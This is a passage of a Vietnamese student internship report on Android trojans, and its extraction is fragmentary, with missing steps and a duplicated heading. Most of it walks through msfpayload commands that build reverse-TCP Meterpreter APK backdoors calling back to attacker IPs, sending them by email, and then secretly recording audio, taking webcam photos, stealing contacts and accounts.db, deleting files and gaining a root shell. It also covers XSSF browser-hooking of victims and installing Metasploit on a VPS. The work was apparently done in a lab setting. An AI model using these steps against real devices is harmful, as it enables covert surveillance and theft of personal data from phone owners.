TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT

Một phần của tài liệu Báo cáo thực tập nghiên cứu trojan, malware cho phép ĐCDL trên điện thoại android (Trang 53)

động)

VI. TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID ANDROID

1. Các công cụ cần thiết:

Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị:

- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng

VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm).

- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo

tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.

- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị.

2. Tiến trình:

Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Tại VMnet0 > Chọn TypeBridged > Chọn card mạng của máy thật

ở ô Bridged to.

Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng dụng *.apk và gửi qua email.

Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp

lhost=<địa chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên file>

Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp

lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk.

- Tạo ứng dụng ReverseTCP có trên file là appsX.apk.

- Địa chỉ IP máy tấn công là 192.168.149.136.

- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023).

- Lưu file tại Desktop.

Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: “msfconsole

Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công.

Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được

Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.

2.1. Khai thác thông tin hê thống:

File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali.

2.3. Khai thác webcam và chụp ảnh lén:

Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp

ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã

2.4. Khai thác file hệ thống của máy nạn nhân:

Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”.

Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD.

Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd

Download” và lệnh liệt kê “ls”.

Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”.

Ở đây dùng lệnh “download appsX.apk”.

Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn

công Kali.

2.6. Kết thúc tấn công:

tablet chạy Android 4.3.

- Cả 2 thiết bị đều có thể kết nối mạng.

- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị.

2. Tiến trình:

Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.

Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework

msfupdate

cd /opt/metasploit/apps/pro/msf3

Bước 5: Thực hiện lệnh “xssf_urls

Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page

Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page:

Ta nhận được thông báo trên máy tấn công Kali:

2.1. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc:

Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường

dẫn mã độc http://192.168.149.136:80/xssf/test.html

2.2. Xem thông tin về nạn nhân đang truy cập:

Dùng lệnh “xssf_information <ID máy nạn nhân>” Ở đây ví dụ là “xssf_information 1

2.3. Khai thác dữ liệu từ máy nạn nhân:

 Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta

có thể thao tác lên máy nạn nhân

 Gửi Thông báo XSSF đến máy nạn nhân qua lệnh:

use auxiliary/xssf/public/misc/alert” “run

Ở máy nạn nhân sẽ nhận được cảnh báo XSSF

Thoát ra msf bằng lệnh “Ctrl+C” > “back

 Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không bằng lệnh:

use auxiliary/xssf/public/misc/visited_pages” “run

 Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa:

use auxiliary/gather/android_htmlfileprovider” “set SRVPORT 87

set URIPATH /” “run

Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/

Ta nhận được thông tin máy nạn nhân:

2.4. Thoát khỏi XSSF của Metasploit:

Host rất nhiều.

- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local.

- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài

nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.

- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn

nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…

2. Đặc điểm của VPS:

- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.

- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng

dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…

3. Giá trị khi sử dụng VPS:

- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.

- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.

- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.

- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.

- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.

4. Kết nối VPS:

- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta

cần sử dụng ứng dụng Remote Desktop Connection.

- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs >

Accessories > Remote Desktop Connection

- Sau đó ta cần nhập vào Địa chỉ IP, UsernamePassword được cung cấp khi

ta đăng ký tài khoản VPS.

- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.

IX. CÀI ĐẶT METASPLOIT TRÊN VPS

 Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại Android

1. Giới thiệu về phần mềm Metasploit:

- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service.

- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, Assembler, và Python.

shared object( DLL) files.

- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus.

- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng

payload Meterpreter này.

3. Cài đặt Metasploit:

Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc

trang download http://www.rapid7.com/products/metasploit/download.jsp . Ta

sử dụng bản Community.

Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để

Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng ký.

Bước 3: Cài đặt phần mềm qua file đã tải về

- Chọn thư mục cài đặt

- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790

- Chọn server và ngày hết hạn, để mặc định.

- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn

- Nhấp Finish và truy cập đến giao diện web của chương trình

Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link https://localhost:3790/

Nhập Key đã nhận từ email:

Chọn ACTIVATE LICENSE

Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit

> Metasploit Console

X. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 1. Tạo ứng dụng chứa mã độc trên Kali Linux: 1. Tạo ứng dụng chứa mã độc trên Kali Linux:

Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android

Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk

2. Tấn công điện thoại Android:

Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút.

Bước 2: Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler

 “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162

 “ set lport 4444 ”  “ run

Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên.

Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau:

Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác

3. Các phương thức tấn công được sử dụng:

Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.

3.1 Ghi âm lén:

3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:

Di chuyển vào thư mục bằng lệnh: cd

Tải về bằng lệnh: download <tên file>

Xóa tập tin bằng lệnh: rm <tên file>

3.4 Truy cập trực tiếp vào hệ thống:

Truy cập vào hệ thống bằng lệnh: “shell” > “su

Kiểm tra máy đã root hay chưa bằng lệnh: “whoami

Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có

3.5 Truy cập và khai thác tài khoản người dùng:

Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l

Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard

Trở về meterpreter và tải file accounts.db về:

3.6 Truy cập và đánh cắp danh bạ điện thoại:

Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:

cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy

Xem nội dung của contacts2.db bằng SQLite Manager

3.7 Một số câu lệnh khác:

- Để biết thêm về các lệnh có thể thực hiện ta dùng help

- ls -l danh mục file và các quyền

- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/

- Để xem danh sách và down load các file hay thay đổi các file trong ROM

Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

KẾT LUẬN

Qua thời gian thực tập tại Trung tâm ATHENA, em đã học hỏi được rất nhiều kiến thức cũng như kinh nghiệm sống. Phong cách và môi trường làm việc chuyên nghiệp, tinh thần trách nhiệm cao, sự quyết tâm và sáng tạo trong công việc, sự cần cù, siêng năng, chăm chỉ.

Do thời gian thực tập chưa lâu, kiến thức bản thân còn hạn chế nên dù đã cố gắng nhưng báo cáo thực tập của em sẽ không tránh khỏi những sai sót, khuyết điểm. Em rất mong được sự góp ý chỉ bảo của các thầy cô để báo cáo thực tập của em được hoàn chỉnh hơn.

Một lần nữa, em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh, các thầy cô, các anh chị công tác trong khoa Điện Tử Viễn Thông và em xin chân thành cảm ơn thầy Võ Đỗ Thắng cùng các thầy cô và các anh chị trong trung tâm ATHENA đã tận tình giúp đỡ em hoàn thành báo cáo này.

TP. Hồ Chí Minh, ngày 3 tháng 11 năm 2014

Sinh viên thực hiện

http://youtu.be/DkxtthrNb9o  Cài đặt Kali Linux trên VMware

http://youtu.be/90e-w3SGJnY

 Cài đặt trojan iCalendar và trojan iMatch

http://youtu.be/1JE0hrsZmsk

 Tạo file chứa mã độc để tấn công vào máy Android

http://youtu.be/iEawr1JupZ8

 Tạo mã độc tên trang web bằng XSSF

http://youtu.be/1Jw8F_H0Jz4

 Tấn công Android từ môi trường VPS

http://youtu.be/4Ueat8f-OoM

 Clip giới thiệu bản thân và đề tài thực tập

http://youtu.be/iRfXCEXI9lo  Clip tổng kết đề tài

PHỤ LỤC II: TRÍCH DẪN NGUỒN THAM KHẢO http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82- may-android-110510 http://sinhvienit.net/forum http://forum.bkav.com.vn http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://choimobile.vn/forums/#thao-luan-hdh-android.62 http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html http://www.genymotion.com/ http://www.whitehat.vn/threads/ https://code.google.com/p/dex2jar/ https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 0.3.3.windows.zip& http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk- bang-giao-dien-cuc-manh.12/

Giáo trình khóa học System HackingTrung tâm đào tạo ATHENA

www.Athena.Edu.Vn

Giáo trình Lập trình trên thiết bị di động AndroidTrung tâm Tin Học

Một phần của tài liệu Báo cáo thực tập nghiên cứu trojan, malware cho phép ĐCDL trên điện thoại android (Trang 53)

Tải bản đầy đủ (PDF)

(81 trang)